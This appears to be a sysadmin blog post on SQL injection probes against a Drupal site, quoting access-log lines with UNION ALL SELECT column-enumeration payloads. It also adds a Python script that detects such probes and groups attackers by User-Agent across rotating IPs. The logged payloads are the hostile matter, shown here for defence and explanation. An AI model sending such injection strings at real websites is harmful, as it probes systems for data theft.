It had been a while … SQL injection

We had been having a fairly quiet spell, it must be a holiday in China … or something like that. But good things don't usually last, so last night they were hammering the machine again.


A couple of hours of doing things like this …

128.6.224.107 - - [19/Feb/2015:3:36:14 +0100] "GET /content/test\xc3\x83\xc2\xadtulo-1?device=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 404 18000 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.5.21022; Media Center PC 6.0; InfoPath.1)"
128.6.224.107 - - [19/Feb/2015:3:36:13 +0100] "GET /content/test\xc3\x83\xc2\xadtulo-1?device=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 404 18000 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.5.21022; Media Center PC 6.0; InfoPath.1)"

At least this time the guy bothered to use a proxy.

He kept at it for a good while, changing IP every now and then …

64.113.32.29 - - [19/Feb/2015:3:36:35 +0100] "GET /content/test\xc3\x83\xc2\xadtulo-1?device=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 404 18000 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.5.21022; Media Center PC 6.0; InfoPath.1)"
64.113.32.29 - - [19/Feb/2015:3:36:34 +0100] "GET /content/test\xc3\x83\xc2\xadtulo-1?device=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 404 18000 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.5.21022; Media Center PC 6.0; InfoPath.1)"

The Drupal parser for these things; I suppose they were trying to exploit SA-CORE-2014-005.

The guy kept hammering away for a good while and then got tired.
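
The requests in the excerpts above add one value to the UNION column list per request and keep the same User-Agent while the source IP changes. The Python script below is an added example, not part of the original post: it flags such probes in a combined-format access log and groups them by User-Agent, so that IP rotation does not split one actor into several. The function names, the sample log lines, the documentation IP addresses and the shortened User-Agent are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)(?: \S+)?" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
UNION_RE = re.compile(r"union\s+(?:all\s+)?select\s+(.+?)\s*(?:--|#|$)", re.I)
FILLER_RE = re.compile(r"^(?:0x[0-9a-f]+|null|\d+)$", re.I)

def union_columns(target):
    """Column count of a UNION SELECT probe made only of filler values, else 0."""
    query = unquote(target.partition("?")[2].replace("+", " "))
    m = UNION_RE.search(query)
    if not m:
        return 0
    cols = [c.strip() for c in m.group(1).split(",")]
    return len(cols) if all(FILLER_RE.match(c) for c in cols) else 0

def scan(lines):
    """Group probes by User-Agent so that IP rotation does not split one actor."""
    actors = defaultdict(lambda: {"ips": set(), "columns": set(), "statuses": set()})
    for line in lines:
        m = LOG_RE.match(line)
        n = union_columns(m["target"]) if m else 0
        if n:
            actor = actors[m["ua"]]
            actor["ips"].add(m["ip"])
            actor["columns"].add(n)
            actor["statuses"].add(m["status"])
    return dict(actors)

# Constructed sample input: documentation IPs, shortened User-Agent.
MARK = "0x31303235343830303536"  # filler literal seen in the post (ASCII "1025480056")
UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"

def sample_line(ip, ncols):
    payload = "999999.9%20union%20all%20select%20" + "%2C".join([MARK] * ncols) + "--"
    return (f'{ip} - - [19/Feb/2015:03:36:14 +0100] "GET /content/test?device={payload} '
            f'HTTP/1.1" 404 18000 "-" "{UA}"')

SAMPLE = [sample_line("192.0.2.10", 7), sample_line("192.0.2.10", 8),
          sample_line("198.51.100.20", 22),
          '203.0.113.5 - - [19/Feb/2015:03:40:00 +0100] '
          '"GET /content/test?device=mobile HTTP/1.1" 200 512 "-" "curl/7.40.0"']

if __name__ == "__main__":
    for ua, a in scan(SAMPLE).items():
        print(len(a["ips"]), "IPs, columns", sorted(a["columns"]), sorted(a["statuses"]), ua)
```

The collected status codes are worth a look: in the post's excerpts every probe got a 404, and any other status for the same pattern is the line to investigate first.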

In short … either you keep things patched … or you are screwed.